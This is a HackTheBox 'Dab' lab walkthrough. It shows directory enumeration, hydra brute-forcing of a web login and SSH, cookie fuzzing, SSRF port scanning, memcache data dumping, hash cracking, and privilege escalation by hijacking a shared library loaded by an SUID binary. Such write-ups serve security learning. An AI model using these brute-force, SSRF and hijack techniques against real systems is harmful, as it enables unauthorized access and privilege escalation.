HackTheBox - Dab

Nmap scan results (Basic and all port scan)

Using gobuster to scan the webpage on port 80 and 8080

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://dab.htb/ -o gobuster-80-scan.out

# cat gobuster-80-scan.out 
/login                (Status: 200) [Size: 473]
/logout               (Status: 302) [Size: 209] [--> http://dab.htb/]
 

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://dab.htb:8080/ -o gobuster-8080-scan.out

# cat gobuster-8080-scan.out 
/socket               (Status: 200) [Size: 287]

Bruteforcing the login page on port 80

hydra -l admin -P /opt/SecLists/Passwords/Common-Credentials/10k-most-common.txt 10.10.10.86 http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Error: Login failed."

Testing the webpage on port 8080

The root page shows the following error. Access denied: password authentication cookie not set

I created a wordlist using the word password and authentication in it.

We will use the Burp's Suite Intruder Tab to FUZZ the cookie name.

Now let's fuzz the value for cookie using wfuzz.

wfuzz -c -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 29 -u http://dab.htb:8080/ -b 'password=FUZZ'

Searching for open ports (SSRF Fuzzing)

ffuf -w ports.txt -u "http://dab.htb:8080/socket?port=FUZZ&cmd=localhost" -b 'password=secret' -c

Pentesting Memcache (Running on port 11211)

Memcached is an open-source distributed memory object caching program that allows us to improve and speed up the performance of dynamic web applications by caching data and objects in Memory. Memcached is also used to cache entire database tables and queries to improve the performance of the database.

References: https://book.hacktricks.xyz/pentesting/11211-memcache

#Commands to be used
stats
version
stats slabs
stats items
stats cachedump <number> 0
get <item-name>

Getting slabs

Getting items with info

Getting key names ( 0 is for unlimited output)

To get the users ITEM, we can use the get users command.

If we use the following command, we won't get any data. This is because of no cache generated recently. Let's logout and login again and then try to get the data.

Hash cracking using John

Let's get this data and apply some BashFu skills to organize the data.

Bash command used: cat users.json | jq | awk -F\" '{print $2,$4}' | sed -r 's/ /:/g' > userpass.txt

Bruteforcing SSH using hydra

Using find command to search for SUID files

/usr/bin/myexec looks suspicious, we can get that file using netcat.

Analyzing the myexec binary in Ghidra

Main Function:

To get the password stored, decode the hex value and the string that we get is s3cur3l0g1n

Creating a malicious library to hijack seclogin()

So the seclogin() function isn't created yet, so this looks like a library hijacking binary.

So the seclogin function is present in libcseclogin.so file, one can use strings on that binary or readelf to check.

Let's create a malicious library.

We can run ldconfig file as root, so let's do that.